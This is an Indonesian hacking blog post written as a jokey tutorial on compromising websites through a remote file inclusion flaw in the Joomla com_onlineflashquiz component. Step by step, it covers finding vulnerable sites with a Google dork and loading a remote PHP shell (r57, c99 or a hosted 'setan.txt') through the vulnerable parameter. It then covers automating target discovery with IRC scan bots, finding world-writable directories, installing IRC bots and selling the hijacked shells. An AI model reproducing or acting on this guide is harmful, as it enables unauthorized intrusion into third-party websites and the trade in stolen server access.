Alo bro, para dekater`s ( penghuni room #dkt Allnetwork ) pa kabar kalian ?? moga - moga baek dan selalu dalam lindungan Tuhan, amien. Ok man, tanpa basa - basi kita langsung aja meluncur ke TKP. Kali ini kita coba untuk mengulas cara sederhana untuk me- Inject Web ato dalam basa bule nya Steal Webhosting ( Tukang Maling Cd/ Jemuran Orang ) gitu kali ya kalo di indonesiakan 
Ok bro, kita langsung ke Tutor Cara Pengerjaannya ada 3 tahap ( pemanasan, inti, dan pendinginan ) :
Tahap 1 " pemanasan "
- Siapakan secangkir kopi panas / hangat ( sesuai selera kamu )
- 1 pak rokok ( kalo g punya ngecer jg gpp ato nge-bon ke warung sebelah )
- Ambil nafas dalam - dalam ( tujuan untuk menguatkan otak dan otot jantung ) tahan dan kalo bisa jangan di hembuskan kalo kalian pengen berhenti di point 3 ini hehehehe.. ok next
- Pastikan ada cewek cantik disamping kamu agar lebih pe`de dan jg kalo capek ato pusing itung - itung ada tukang pijat gratis aw..aw..aw... Kita lanjut ke tahap berikutnya yaitu :
- Persiapkan Browser " Mozilla Firefox " kalo g ada kalian bisa donlot ( wajib pake browser ini karena Inject Web ga akan jalan kalo pake browser selain Mozilla, alasan yang masuk akal kan ?? )
- Buka situs
.com - klik "web apps" atau search dengan ketik File Include / File Inclusion Vulnerability / Include Vulnerabilities"
- Misal kita buka http://www.milw0rm.com/exploits/5345
- disitu ada tulisan [o] Exploit http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[evilcode] berarti software tersebut adalah joomla onlineflashquiz yamg memiliki vuln pada "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=" dan [evilcode] yang dimaksud adalah scripts setan shells php,kamu bisa pake scripts kamu sendiri atau cari di mbah google.
- buka Mbah Google memakai mozilla firefox,lalu ketik di kolom search "inurl:option,com_onlineflashquiz"
- akan muncul daftar nama2 situs yang memakai software joomla onlineflashquiz yaitu "com_onlineflashquiz"
- ambilah salah satu dari sebuah situs tersebut nama webnya aja. misalnya http://grandong.com/index.php?option=com_onlineflashquiz&task=1 ambilah nama web domainnnya aja menjadi http://grandong.com/
- lalu buka browser baru dan kopi paste web tadi
- sambungkan dengan software yang vuln diatas sehingga menjadi http://grandong.com/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
- sambungkan lagi dengan scripts shell kamu,terserah pake r57,c99 atau shells setan. Misalnya alamat scripts setan kamu "http://ibliz.net/scripts/setan.txt"
- sehingga web diatas bisa diinjek melalui browser mozilla firefox dengan alamat lengkapnya
"http://grandong.com/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=http://ibliz.net/scripts/setan.txt?"
Mengapa memakai tanda ? disetiap akhiran,karena itu bertujuan agar lebih safe aja,gak usah pake tanda ? juga gak apa kok. - Kalo gak pingin capek2 cari injekan,kamu bisa join di channel MIRC/IRC yang mempunyai bot scan
- jadi kita tinggal scan sambil chatingan,biar bot scan aja yang mencari injekan kita ( mudah bukan ? )
- cara pake bot scan biasanya pake perintah !scan [vuln] [dork] atau `scan [vuln] [dork]
- [vuln] adalah path injekan diatas "component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir="
[dork] adalah kata kunci untuk mencari pada situs "inurl:com_onlineflashquiz" - jadi kita scan pake perintah !scan component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir= inurl:com_onlineflashquiz
- sampe disini artikel yang bisa aku berikan,kalo masih bingung pegangan pada tembok atau pagar di depan rumah kamu
- Ucapan Selamat dari kita " kamu sukses untuk menjadi maling ! "
- Kalo kamu sudah mendapatkan target, cari direktory yang tidak permision denied / direktory yang bisa di upload dengan mengetik " find / -type d -perm 777 "
- kamu bisa bikin eggdrop ato psy disitu ( kalo shell nya support ) cara bikinnya liat arcive di blog ini pada bulan februari di situ kita bahas mengenai ini.
- Kejar cewek yang dampingin kamu tadi, yang pasti dah tinggalin kamu karena itu resikonya pecinta dunia maya/komputer
- Ajakin kencan cewek kamu tadi ( dinner ato ngapain aja terserah kamu )
- Kalo g punya uang, tenang bro kalian punya deposito yang tidak kalian sadari, jual psy ato shell injekan kamu tadi dapet dech duit buat kencan !!! huakakakkaka....
copyright by http://www.dekate.co.cc/
